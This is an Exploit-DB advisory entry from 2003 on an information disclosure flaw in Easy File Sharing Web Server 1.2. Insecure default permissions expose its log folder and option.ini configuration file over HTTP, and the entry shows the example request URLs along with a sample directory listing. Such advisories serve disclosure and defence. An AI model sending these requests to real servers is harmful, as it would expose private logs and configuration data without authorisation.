Easy File Sharing Web Server 1.2 - Information Disclosure

EDB-ID:

23222

CVE:

N/A




Platform:

Windows

Date:

2003-10-06


source: https://www.securityfocus.com/bid/8777/info

Easy File Sharing Web Server has been reported prone to an information disclosure vulnerability. The issue presents itself due to insecure default permissions set on folders that contain Easy File Sharing Web Server log and configuration files. It has been reported that a remote attacker may make a HTTP request for affected log and configuration files and disclose potentially sensitive information contained therein. 

http://www.example.com/log/

Name Size Date Description Author
20030728.txt 9KB 2003-07-28 15:56:34 none none
20030730.txt 18KB 2003-07-30 16:58:58 none none
20030807.txt 12KB 2003-08-07 13:56:18 none none
20030811.txt 18KB 2003-08-11 13:34:15 none none
20030812.txt 10KB 2003-08-12 17:03:20 none none
20030815.txt 10KB 2003-08-15 16:59:58 none none
20030818.txt 31KB 2003-08-18 14:14:30 none none
20030902.txt 9KB 2003-09-02 14:41:57 none none
20030904.txt 8KB 2003-09-04 14:18:59 none none
20030905.txt 1KB 2003-09-05 09:13:28 none none
20030908.txt 4KB 2003-09-08 12:32:22 none none

http://www.example.com/option.ini